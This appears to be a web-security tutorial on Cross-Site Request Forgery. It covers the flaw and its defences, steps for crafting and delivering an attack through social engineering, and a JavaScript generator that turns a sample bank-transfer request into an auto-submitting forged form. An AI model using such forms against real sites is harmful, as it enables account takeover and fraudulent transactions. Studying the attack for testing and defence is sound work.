
CSRF

Introduction

Cross-Site Request Forgery (CSRF) is a web vulnerability that lets an attacker make a victim's browser send requests to a website on the victim's behalf. It works when the victim is authenticated to the vulnerable website and has an active session: the attacker tricks the victim into triggering a request to that site with attacker-chosen parameters, and the browser attaches the victim's session cookie to it automatically.
For example, consider a victim who is logged into their online banking account. The attacker tricks the victim into visiting a page or clicking a link that sends a request to transfer money from the victim's account to the attacker's account. If the website is vulnerable to CSRF, the transfer is executed even though the victim never intended to initiate it.
To prevent CSRF, websites can require an unpredictable token, bound to the user's session, in every state-changing request, or mark the session cookie SameSite so that the browser does not attach it to requests initiated from other sites.

Crafting the attack

First, analyze the target website to check whether the following conditions are met:
  • A relevant action worth forging, such as one that takes over an account, escalates privileges, or changes a user's password or email address.
  • Cookie-based session handling, so that the browser attaches the session cookie to the forged request. The victim must already be logged in.
  • No unpredictable request parameters that the attacker cannot determine or guess, such as a server-issued nonce or a CSRF token. Note that a CSRF token is sometimes not bound to the session; in that case the attacker can obtain a token with their own account and reuse it in the malicious form.
Second, craft a CSRF exploit to deliver to the victim.
Burp Suite can generate it for you: right-click the request and choose Engagement tools > Generate CSRF PoC. The output is an HTML page that, once opened by the victim, sends the malicious request to the target website.
As an alternative, there is the online tool CSRF PoC Generator.
Third, host the generated HTML on a page you control and open it in a browser that is logged in to the target website with a dummy account, to confirm that the intended request goes through.
Finally, deliver the link to the victim and get them to click it through social engineering.
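What a PoC generator produces, as an added example written for this page (not Burp's code and not the page's own): a raw request copied from the proxy is parsed into method, URL and parameters, and rendered as an HTML page with a hidden-input form that submits itself when opened. The sample request, the host bank.example and the /transfer endpoint are constructed for the demo. Only requests a plain HTML form can replay are handled: GET query strings and form-encoded POST bodies.

```javascript
// Added example for this page; not Burp's or the page's own code.
// Assumptions: constructed sample request, host bank.example, endpoint /transfer.

// A raw request as copied from a proxy (constructed sample). Its Cookie header is
// irrelevant to the PoC: the victim's browser attaches the victim's own cookie.
const SAMPLE_REQUEST = [
  'POST /transfer HTTP/1.1',
  'Host: bank.example',
  'Cookie: session=0123456789abcdef',
  'Content-Type: application/x-www-form-urlencoded',
  '',
  'to=mallory&amount=1000',
].join('\r\n');

// Parse a raw request into { method, url, params }.
function parseRawRequest(raw) {
  const sepIdx = raw.search(/\r?\n\r?\n/);
  const head = sepIdx === -1 ? raw : raw.slice(0, sepIdx);
  const body = sepIdx === -1 ? '' : raw.slice(sepIdx).replace(/^\r?\n\r?\n/, '');
  const lines = head.split(/\r?\n/);
  const [method, target] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  if (!headers.host) throw new Error('request has no Host header');
  const url = new URL(target, `https://${headers.host}`);
  const params = {};
  if (method.toUpperCase() === 'GET') {
    for (const [k, v] of url.searchParams) params[k] = v;
    url.search = ''; // the form re-adds the parameters as the query string
  } else {
    const ctype = headers['content-type'] || '';
    if (!ctype.startsWith('application/x-www-form-urlencoded')) {
      throw new Error(`unsupported body type: ${ctype || 'none'}`);
    }
    for (const [k, v] of new URLSearchParams(body)) params[k] = v;
  }
  return { method: method.toUpperCase(), url: url.toString(), params };
}

// Escape a value for use inside an HTML attribute, so parameter values cannot
// break out of the generated form.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Render the PoC page: a form aimed at the target with every parameter as a hidden
// input. autoSubmit=true fires it on load (for delivery); false leaves only the
// button, which is handier while testing with a dummy account.
function generateCsrfPoc({ method, url, params }, { autoSubmit = true } = {}) {
  if (method !== 'GET' && method !== 'POST') throw new Error(`HTML forms cannot send ${method}`);
  const inputs = Object.entries(params)
    .map(([k, v]) => `      <input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}" />`)
    .join('\n');
  const trigger = autoSubmit ? '    <script>document.forms[0].submit();</script>' : '';
  return [
    '<html>',
    '  <body>',
    `    <form action="${escapeHtml(url)}" method="${method}">`,
    inputs,
    '      <input type="submit" value="Submit request" />',
    '    </form>',
    trigger,
    '  </body>',
    '</html>',
  ].filter(line => line !== '').join('\n');
}
```

Call generateCsrfPoc(parseRawRequest(SAMPLE_REQUEST)) to get the page; with autoSubmit set to false you get the button-only variant for the dummy-account test in step three. Requests that a form cannot reproduce (PUT, JSON bodies, custom headers) are rejected rather than silently mangled, since those usually need a different delivery technique or are not exploitable by CSRF at all.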
